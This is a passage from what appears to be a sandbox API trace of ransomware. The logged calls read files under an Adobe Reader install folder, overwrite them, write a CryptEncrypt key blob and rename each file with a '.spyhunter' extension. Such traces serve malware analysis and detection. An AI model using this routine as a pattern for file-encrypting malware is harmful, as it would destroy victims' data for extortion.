(in: hFile=0x154, lpBuffer=0x270f5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x270f5ec*, lpNumberOfBytesWritten=0x270f5ac*=0x4, lpOverlapped=0x0) returned 1 [0119.957] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5ac*=0x30, lpOverlapped=0x0) returned 1 [0119.957] CloseHandle (hObject=0x154) returned 1 [0119.957] GetProcessHeap () returned 0x2c0000 [0119.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0119.957] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB.spyhunter") returned 81 [0119.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb.spyhunter")) returned 1 [0119.963] GetProcessHeap () returned 0x2c0000 [0119.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0119.963] GetProcessHeap () returned 0x2c0000 [0119.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.963] GetProcessHeap () returned 0x2c0000 [0119.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e61ec8 | out: hHeap=0x2c0000) returned 1 [0119.963] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5f0 | out: pbBuffer=0x270f5f0) returned 1 [0119.963] GetProcessHeap () returned 0x2c0000 [0119.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.963] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5e8*=0x30) returned 1 [0119.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0120.078] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm") returned 75 [0120.078] StrStrW (lpFirst="zx______.pfm", lpSrch=".txt") returned 0x0 [0120.078] GetProcessHeap () returned 0x2c0000 [0120.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.078] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f5ac*=0x2ab, lpOverlapped=0x0) returned 1 [0120.079] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffd55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.079] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f5ac*=0x2ab, lpOverlapped=0x0) returned 1 [0120.079] GetProcessHeap () returned 0x2c0000 [0120.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.079] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.079] WriteFile (in: hFile=0x154, lpBuffer=0x270f5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x270f5ec*, lpNumberOfBytesWritten=0x270f5ac*=0x4, lpOverlapped=0x0) returned 1 [0120.080] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5ac*=0x30, lpOverlapped=0x0) returned 1 [0120.080] CloseHandle (hObject=0x154) returned 1 [0120.080] GetProcessHeap () returned 0x2c0000 [0120.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.080] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm.spyhunter") returned 85 [0120.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm.spyhunter")) returned 1 [0120.081] GetProcessHeap () returned 0x2c0000 [0120.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.081] GetProcessHeap () returned 0x2c0000 [0120.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0120.081] GetProcessHeap () returned 0x2c0000 [0120.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63be0 | out: hHeap=0x2c0000) returned 1 [0120.081] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5e8 | out: pbBuffer=0x270f5e8) returned 1 [0120.081] GetProcessHeap () returned 0x2c0000 [0120.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0120.081] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5e0*=0x30) returned 1 [0120.081] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0120.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf") returned 79 [0120.081] StrStrW (lpFirst="MyriadPro-BoldIt.otf", lpSrch=".txt") returned 0x0 [0120.082] GetProcessHeap () returned 0x2c0000 [0120.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0120.082] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.136] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.136] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.136] GetProcessHeap () returned 0x2c0000 [0120.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.136] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.137] WriteFile (in: hFile=0x154, lpBuffer=0x270f5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x270f5e4*, lpNumberOfBytesWritten=0x270f5a4*=0x4, lpOverlapped=0x0) returned 1 [0120.149] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5a4*=0x30, lpOverlapped=0x0) returned 1 [0120.149] CloseHandle (hObject=0x154) returned 1 [0120.149] GetProcessHeap () returned 0x2c0000 [0120.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.149] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf.spyhunter") returned 89 [0120.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf.spyhunter")) returned 1 [0120.150] GetProcessHeap () returned 0x2c0000 [0120.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.150] GetProcessHeap () returned 0x2c0000 [0120.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0120.150] GetProcessHeap () returned 0x2c0000 [0120.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73c10 | out: hHeap=0x2c0000) returned 1 [0120.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5e8 | out: pbBuffer=0x270f5e8) returned 1 [0120.150] GetProcessHeap () returned 0x2c0000 [0120.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0120.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5e0*=0x30) returned 1 [0120.151] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0120.165] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt") returned 119 [0120.165] StrStrW (lpFirst="DisplayLanguageNames.es_ES_PREEURO.txt", lpSrch=".txt") returned=".txt" [0120.165] lstrlenW (lpString=".txt") returned 4 [0120.165] lstrlenW (lpString=".txt") returned 4 [0120.165] GetProcessHeap () returned 0x2c0000 [0120.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.165] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.197] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.197] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.205] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.205] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f5a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.205] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f5a4*=0x1ec8, lpOverlapped=0x0) returned 1 [0120.205] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffe138, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.205] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1ec8, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f5a4*=0x1ec8, lpOverlapped=0x0) returned 1 [0120.205] GetProcessHeap () returned 0x2c0000 [0120.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0120.205] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.205] WriteFile (in: hFile=0xf4, lpBuffer=0x270f5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x270f5e4*, lpNumberOfBytesWritten=0x270f5a4*=0x4, lpOverlapped=0x0) returned 1 [0120.206] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5a4*=0x30, lpOverlapped=0x0) returned 1 [0120.206] CloseHandle (hObject=0xf4) returned 1 [0120.206] GetProcessHeap () returned 0x2c0000 [0120.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0120.206] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.spyhunter") returned 129 [0120.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt.spyhunter")) returned 1 [0120.207] GetProcessHeap () returned 0x2c0000 [0120.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0120.207] GetProcessHeap () returned 0x2c0000 [0120.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0120.207] GetProcessHeap () returned 0x2c0000 [0120.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e26eb0 | out: hHeap=0x2c0000) returned 1 [0120.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5e0 | out: pbBuffer=0x270f5e0) returned 1 [0120.208] GetProcessHeap () returned 0x2c0000 [0120.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0120.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5d8*=0x30) returned 1 [0120.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0120.208] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat") returned 90 [0120.208] StrStrW (lpFirst="icudt26l.dat", lpSrch=".txt") returned 0x0 [0120.208] GetProcessHeap () returned 0x2c0000 [0120.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.208] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f59c*=0x2800, lpOverlapped=0x0) returned 1 [0120.225] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.225] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f59c*=0x2800, lpOverlapped=0x0) returned 1 [0120.226] GetProcessHeap () returned 0x2c0000 [0120.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0120.226] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.226] WriteFile (in: hFile=0xf4, lpBuffer=0x270f5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f59c, lpOverlapped=0x0 | out: lpBuffer=0x270f5dc*, lpNumberOfBytesWritten=0x270f59c*=0x4, lpOverlapped=0x0) returned 1 [0120.266] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f59c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f59c*=0x30, lpOverlapped=0x0) returned 1 [0120.267] CloseHandle (hObject=0xf4) returned 1 [0120.285] GetProcessHeap () returned 0x2c0000 [0120.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0120.286] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.spyhunter") returned 100 [0120.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat.spyhunter")) returned 1 [0120.469] GetProcessHeap () returned 0x2c0000 [0120.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0120.469] GetProcessHeap () returned 0x2c0000 [0120.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0120.469] GetProcessHeap () returned 0x2c0000 [0120.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d3c0 | out: hHeap=0x2c0000) returned 1 [0120.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5c0 | out: pbBuffer=0x270f5c0) returned 1 [0120.577] GetProcessHeap () returned 0x2c0000 [0120.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0120.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5b8*=0x30) returned 1 [0120.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0120.578] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT") returned 96 [0120.578] StrStrW (lpFirst="CP950.TXT", lpSrch=".txt") returned 0x0 [0120.578] GetProcessHeap () returned 0x2c0000 [0120.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.578] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f57c*=0x2800, lpOverlapped=0x0) returned 1 [0120.785] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.785] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f57c*=0x2800, lpOverlapped=0x0) returned 1 [0120.786] GetProcessHeap () returned 0x2c0000 [0120.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0120.786] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.786] WriteFile (in: hFile=0x16c, lpBuffer=0x270f5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f57c, lpOverlapped=0x0 | out: lpBuffer=0x270f5bc*, lpNumberOfBytesWritten=0x270f57c*=0x4, lpOverlapped=0x0) returned 1 [0121.105] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f57c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f57c*=0x30, lpOverlapped=0x0) returned 1 [0121.105] CloseHandle (hObject=0x16c) returned 1 [0121.232] GetProcessHeap () returned 0x2c0000 [0121.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0121.233] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.spyhunter") returned 106 [0121.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt.spyhunter")) returned 1 [0121.233] GetProcessHeap () returned 0x2c0000 [0121.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0121.233] GetProcessHeap () returned 0x2c0000 [0121.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0121.233] GetProcessHeap () returned 0x2c0000 [0121.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3c90 | out: hHeap=0x2c0000) returned 1 [0121.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5b8 | out: pbBuffer=0x270f5b8) returned 1 [0121.235] GetProcessHeap () returned 0x2c0000 [0121.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0121.235] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5b0*=0x30) returned 1 [0121.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\tbprinting.exe" (normalized: "c:\\program files (x86)\\adobe\\tbprinting.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.235] GetProcessHeap () returned 0x2c0000 [0121.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0121.235] GetProcessHeap () returned 0x2c0000 [0121.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d9d8 | out: hHeap=0x2c0000) returned 1 [0121.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 